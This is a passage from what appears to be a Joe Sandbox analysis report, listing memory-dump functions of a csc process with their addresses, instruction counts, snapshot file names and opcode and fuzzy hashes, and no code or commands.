                                                      • Opcode ID: d3ae539fe4f48b326cf78a04d2dca16d73c314365c6ffa412609bfb6da351e8c
                                                      • Instruction ID: 3a1ff109a7eb86bcded66b28e6150df01066d86e22c603c2f79a33c6630e3052
                                                      • Opcode Fuzzy Hash: d3ae539fe4f48b326cf78a04d2dca16d73c314365c6ffa412609bfb6da351e8c
                                                      • Instruction Fuzzy Hash: 5C51E571A041169BDB29CB24CC4ABF9BBB6FF01314F1842AAE51A976C0EB749981CF40
                                                      Function 0539B136 Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9eddc84438c3efe206c651145b517002f55284739d964d1bec844268de03f70d
                                                      • Instruction ID: 0e1c5b59f47b94591967b0bc063617b2b293f051069d746b7e9d3dd0a6573ac8
                                                      • Opcode Fuzzy Hash: 9eddc84438c3efe206c651145b517002f55284739d964d1bec844268de03f70d
                                                      • Instruction Fuzzy Hash: 42419DB1684609EFDB29EF64D895B6AFBAAFF10790F004469E651DB650D7B0DC00CB60
                                                      Function 0546866E Relevance: .1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction ID: af6753190b0d8f340d977723e0060a33c61f8bcc4a1789b2192dcd561fd4afdc
                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction Fuzzy Hash: 7F419275B14205ABDB15DF99CC84BFFB7FABF88600F1440AAE805A7341DA70DD018762
                                                      Function 053CA470 Relevance: .1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67411217d2187938b74a4a8155a23ff5c361146f60b4d45d0c69740f0af3a16f
                                                      • Instruction ID: 106e5d68fd2df52224bda8bd268884145e4c4a234ffb6a335a6205a14ff0320e
                                                      • Opcode Fuzzy Hash: 67411217d2187938b74a4a8155a23ff5c361146f60b4d45d0c69740f0af3a16f
                                                      • Instruction Fuzzy Hash: CD41DE32A44209CFCF14DF68D485BEE7BB5BB18314F1445EAE412AB684CB749D11CBA0
                                                      Function 053CD6E0 Relevance: .1, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e624d36f03c20ca21f7d26fa266b9c1479ae07ef3c7f1bbb19ba2efe31a12b8
                                                      • Instruction ID: 7747da7758e54352348cc2dac034f5ea6b8a42e3767a42c43d2724d72a792052
                                                      • Opcode Fuzzy Hash: 3e624d36f03c20ca21f7d26fa266b9c1479ae07ef3c7f1bbb19ba2efe31a12b8
                                                      • Instruction Fuzzy Hash: CF41E376214240AFC738EF24C999EAB7BA9FF85720F10057EF91587291CB34E806CB91
                                                      Function 0539A020 Relevance: .1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction ID: b34e8be1e8e581f6bd8b876bd31bc9271c318528ea6c5242f7764d1ded447c72
                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction Fuzzy Hash: E94139B1B08311EBDF28DE25C464BBAF772FB80754F15C16AEA458B340D6718D80CBA0
                                                      Function 053D0710 Relevance: .1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                      • Instruction ID: ecd1cf807f48ad09d373ce7d7d4b87befbea88eed0a0f2727b11c9ee7bdad163
                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                      • Instruction Fuzzy Hash: AD413C72A00605EFD769CFA8D984AAAB7F9FF08700F10456DE156DB650E370EA44CF60
                                                      Function 053A262C Relevance: .1, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5fcd45584d0f85ac6e2a594960b94962257475addcdd66d195f69bdd9bae962
                                                      • Instruction ID: c2d8a409649dfc5c604c1372a3f442b8b156a332995ee3a43c72fad70a1474c7
                                                      • Opcode Fuzzy Hash: b5fcd45584d0f85ac6e2a594960b94962257475addcdd66d195f69bdd9bae962
                                                      • Instruction Fuzzy Hash: 04410676A02700CFCB25EF24C945BA6BBF6FF84310F10826AE506DB6A1DB709A41CF51
                                                      Function 054207C3 Relevance: .1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ca76d12a91e3ffd5f1ad6356f3a195dda49b68d12ff62d5f4fb802a2ab10d30a
                                                      • Instruction ID: acae7aeaca2715af347bd43990a40344103bfe0c673b33351fbc52f5a579c8a3
                                                      • Opcode Fuzzy Hash: ca76d12a91e3ffd5f1ad6356f3a195dda49b68d12ff62d5f4fb802a2ab10d30a
                                                      • Instruction Fuzzy Hash: CB4171726183509FD720DF25C849FABBBE8FF88654F404A2EF598D7250DB709905CB92
                                                      Function 054205A7 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c774ef236b471f4ba6dd3d010c4e9ffc72495ebbf7c6dafa0aa02c0b2d021308
                                                      • Instruction ID: f194636ed9fa45694936bae7c97a628f680ee6a4605e2489ab8feff1d5ccbaec
                                                      • Opcode Fuzzy Hash: c774ef236b471f4ba6dd3d010c4e9ffc72495ebbf7c6dafa0aa02c0b2d021308
                                                      • Instruction Fuzzy Hash: E241C4726086619FC321DF69D844AABB3E5FFC8700F444A5EF85997780E730E914C7A6
                                                      Function 053A5702 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0ec62a2e81455e29df7cfe36b7692f782b81addc552c8f1fb3f890cd7476d5b6
                                                      • Instruction ID: a4dfff7d003488c3779758de31d345efd14c5b2be50ab14f0b79f131edf3ff10
                                                      • Opcode Fuzzy Hash: 0ec62a2e81455e29df7cfe36b7692f782b81addc552c8f1fb3f890cd7476d5b6
                                                      • Instruction Fuzzy Hash: F3319F32701A06EBDB56DB60C988FEAFBAAFF44654F405069E90597E50DB71A820CBD0
                                                      Function 053C50E4 Relevance: .1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                      • Instruction ID: b325899d44831e69c6fb1f31d080a0f562b6283ebf80f057dd1c6eda5b9a8755
                                                      • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                      • Instruction Fuzzy Hash: EA31EA317083419FDF21DA18C808B6BBBE5FB85750F5885AEF4858B785E674EC41C792
                                                      Function 0539B480 Relevance: .1, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f75bd75332fb788791da0a8f98eac72cf33a3b0dec3755b3d64432e8cd99acf9
                                                      • Instruction ID: c94824d8b64df17d1527a833e23ab54e73380b7fbd674136250d1ebb38f03b05
                                                      • Opcode Fuzzy Hash: f75bd75332fb788791da0a8f98eac72cf33a3b0dec3755b3d64432e8cd99acf9
                                                      • Instruction Fuzzy Hash: 483108B26042049FCB25DF14D450EA6B7AAFF85760F14426DFD454B251DB71ED42CBE0
                                                      Function 054661C3 Relevance: .1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 281dc53c3d90818e1047e7832775bd20c38512a7a99faa9192a8dcf292f526f5
                                                      • Instruction ID: 129f238345d396aa57e069ea4e8a171bf4c884544153ddcc4f2fa3e93f37439d
                                                      • Opcode Fuzzy Hash: 281dc53c3d90818e1047e7832775bd20c38512a7a99faa9192a8dcf292f526f5
                                                      • Instruction Fuzzy Hash: FC31C475A00265ABDB19DF98CC84FEEB7B5FB48B40F454169E901EB284D770ED01CB94
                                                      Function 053A07AF Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fc6cf20570478db20d32063bb83631489a1c4562395a151b8b7d67e844c6586
                                                      • Instruction ID: cfbec06276798bcc724affd226c5a66371e4dbc9bacd174e37b964e219e7cddc
                                                      • Opcode Fuzzy Hash: 2fc6cf20570478db20d32063bb83631489a1c4562395a151b8b7d67e844c6586
                                                      • Instruction Fuzzy Hash: 8331D173A04611DBCB1BEE648888E6BBBAEEF94650F014529FD55A7310DA30DC0197E5
                                                      Function 054660B8 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d01b36788c27a0f9fcdba5997e461ee1571b95de04de06b15bdcae5fc903769d
                                                      • Instruction ID: 620492a43807807c3c328dfb72f7438077425b16661b6a348eb7c7034e161c93
                                                      • Opcode Fuzzy Hash: d01b36788c27a0f9fcdba5997e461ee1571b95de04de06b15bdcae5fc903769d
                                                      • Instruction Fuzzy Hash: 4A31DF71B00605ABDF26DFA9C851BEFBBBAAF44354F1201ABE605DB341DA70DD018B91
                                                      Function 053A8550 Relevance: .1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 878ca8b1700b3d106241cc93a59113856b7b0fdf4c32df0f11d6695f5a37670a
                                                      • Instruction ID: b312d0775abed172cd56a25478a014e4a212db315dcdb86b845ad2c96afffb14
                                                      • Opcode Fuzzy Hash: 878ca8b1700b3d106241cc93a59113856b7b0fdf4c32df0f11d6695f5a37670a
                                                      • Instruction Fuzzy Hash: 15316E766093018FD720CF19C848B6BF7E5FB88710F1549AEE9869B391D7B1E844CB91
                                                      Function 0539D6AA Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                      • Instruction ID: 23ab493be5b8275bbfd7c8f66ab50e61cd08828a3229c374a7b9c64376484adc
                                                      • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                      • Instruction Fuzzy Hash: A331BBBA701104AFDF25DE58C985F6E73BAEB80750F158828ED49DB254D3B0DD40CB90
                                                      Function 053A57C0 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5f5f6fb82a539f0198ed183278e5d86c366981cc72ad9703ec59ee8b899dede6
                                                      • Instruction ID: ade58e4c158dd69c7e5a4ba0241b487a9062e0354ea3d55520a68f72aeb454d7
                                                      • Opcode Fuzzy Hash: 5f5f6fb82a539f0198ed183278e5d86c366981cc72ad9703ec59ee8b899dede6
                                                      • Instruction Fuzzy Hash: 32318036715A05FFDB56DF24DA84EAABBA6FF44200F54606AE90187F50D775E830CB80
                                                      Function 053DA6C7 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction ID: 75e1425c036283049a54c1a9365c2f549373f3d6d6df415f6c848a409deae20f
                                                      • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction Fuzzy Hash: 0E313E72B05B00AFD760CF69DE40B57B7F9BB08650F04096DA59AC3B50E670E900CB64
                                                      Function 053F7190 Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                      • Instruction ID: 7532645778a182b51b4fa662a5e5c3698ba2698e97097ee03cbdc7f0b4c968d3
                                                      • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                      • Instruction Fuzzy Hash: C9316A75604206CFC710CF18C48095AFBF6FF89314B2986A9EA599B325E730ED06CB91
                                                      Function 0539E420 Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25789bde5739ccf3b10fad0d75535476853c6a6259653c9788c8de0cfb805452
                                                      • Instruction ID: b5f5e13de02420e79b73e424d7fb99c27cd187171f48c05b093362c3aedb73d5
                                                      • Opcode Fuzzy Hash: 25789bde5739ccf3b10fad0d75535476853c6a6259653c9788c8de0cfb805452
                                                      • Instruction Fuzzy Hash: FB31B4B2A0152CABDF39DB14CC41FEE77BEEB05740F0101A5E645A7290D6B4AE909F91
                                                      Function 0539C156 Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 395b560ef87d18a9c2cec50c7ac2e3ec331c36fe00cc9fc2b9705e549e01ff56
                                                      • Instruction ID: ca70fdf48a5c8f638e90b2b9ae433f109062f328d71e0103d24a254b2024a04d
                                                      • Opcode Fuzzy Hash: 395b560ef87d18a9c2cec50c7ac2e3ec331c36fe00cc9fc2b9705e549e01ff56
                                                      • Instruction Fuzzy Hash: E4310BB66002108BDB24AF24CC49BF977B5FF40314F548569EE469F781DAB4D985CBD0
                                                      Function 053D4588 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                      • Instruction ID: 753fed9565498286eaced1a5200df1cdb949829a6572be70a39e18730cfed523
                                                      • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                      • Instruction Fuzzy Hash: 91216072A00608ABCF15DF58D984A8AB7B5FF48714F108465FD169B281D6B2EA058BA0
                                                      Function 053D44B0 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 809f09cef8d27985ae0a75e89efbb51cb06ba295961370ecf839b5fb9683adda
                                                      • Instruction ID: 8bb89670814ea9e0adcabed566d640a8ba6aab7ac0442551d482ad1eadb06fb3
                                                      • Opcode Fuzzy Hash: 809f09cef8d27985ae0a75e89efbb51cb06ba295961370ecf839b5fb9683adda
                                                      • Instruction Fuzzy Hash: 6E21C3726087459BCB21CF18D980B6BB7FAFB887A0F044519FD559B240D7B1E900CBA1
                                                      Function 0541E609 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62a979d997acf236cd784cfdbf7fd451f45d8362d61646c54734f536474f6553
                                                      • Instruction ID: dd278c68f07c9b3c0205170b237365b95e2713c2b4763c152b8b112bcb24dbe4
                                                      • Opcode Fuzzy Hash: 62a979d997acf236cd784cfdbf7fd451f45d8362d61646c54734f536474f6553
                                                      • Instruction Fuzzy Hash: 86317079A00205DFCB18CF18C5449EEBBBAFF84304B95445AEC099B390E731E961CB94
                                                      Function 053DD530 Relevance: .1, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fb76528ea118df911793d9f2d21490061865f649d042dc938770efc983d1195
                                                      • Instruction ID: 34bf036818805eddebb18e2dd94b161c09bc782f0292ee0c163a27786cbe6623
                                                      • Opcode Fuzzy Hash: 6fb76528ea118df911793d9f2d21490061865f649d042dc938770efc983d1195
                                                      • Instruction Fuzzy Hash: E12129726043109BDB10EF64E94AF97BBFAAB54694F410C1AFA44C7A50EB30DD04C7E5
                                                      Function 053A3616 Relevance: .1, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d945e37c06239984a7258fb827e5d662b98dd511dfa165655371866715c5ae4
                                                      • Instruction ID: 8e35426787479c494d4b7a85e8a595b2e0d42251e5a1c318367f816b8ae8dc02
                                                      • Opcode Fuzzy Hash: 1d945e37c06239984a7258fb827e5d662b98dd511dfa165655371866715c5ae4
                                                      • Instruction Fuzzy Hash: 622126363053509FDB219F04C999BAABFA6FFC1B10F15096AF9414BA60CAF0EC04CB91
                                                      Function 054206F1 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7429397c17b029a4a50f00e49a356ab3eb6b7390c25d0cfcbd860bbed0998c40
                                                      • Instruction ID: f6912bb6f58bf852475914e5118b402f43cdc7f73ebeffa5fdb0e12c0e19c153
                                                      • Opcode Fuzzy Hash: 7429397c17b029a4a50f00e49a356ab3eb6b7390c25d0cfcbd860bbed0998c40
                                                      • Instruction Fuzzy Hash: D9218071A00239ABCF15DF59C885AFEB7F4FF88740B5000AAF945A7250D778AD41CBA0
                                                      Function 053D9660 Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe5b4e73ee3f474118fb81f208b205a884e9b7fdb0a6d1e60ba6177f9266e080
                                                      • Instruction ID: 9c3683348d4b270a3885a8c9e7e4a03e46507b4709eb6f6731f72e6fe3fde4ad
                                                      • Opcode Fuzzy Hash: fe5b4e73ee3f474118fb81f208b205a884e9b7fdb0a6d1e60ba6177f9266e080
                                                      • Instruction Fuzzy Hash: DE21F833215600DBCF35EA25D855FF7BBB7FB40230F10461AE85246EA4DB72A841CB65
                                                      Function 0542019F Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e073de6dbfc5c6e01cb499f1db98f12507df3ab1d1258074170459be1e8d4850
                                                      • Instruction ID: 498c07fb4778ea43e1d0d397077ec480aa6ff080717403aec50308fcb514b7d8
                                                      • Opcode Fuzzy Hash: e073de6dbfc5c6e01cb499f1db98f12507df3ab1d1258074170459be1e8d4850
                                                      • Instruction Fuzzy Hash: 5221BC71A00624AFD715DF68C848FAAB7E8FF88740F1400AAF909D7BA0D634ED00CB64
                                                      Function 0541D0C0 Relevance: .1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                      • Instruction ID: 40f29828387d78c8a4f5ccb5fd9ce5d91a0fb18047f2db8f2e447dd961843711
                                                      • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                      • Instruction Fuzzy Hash: 0521A4B2A44704ABD321DF28CC41B9BBBA5FF89760F10052EF9459B3A1D774E90187AD
                                                      Function 053C15A9 Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                      • Instruction ID: 493e70df9384c9a94cfbca71dde4325a94319bd019751efa80e1bbf80aa623ee
                                                      • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                      • Instruction Fuzzy Hash: 6A210471A04685DBE722CB5AC948BA27BEABF40244F2904F6DD068B792E678DC41D750
                                                      Function 0539B765 Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
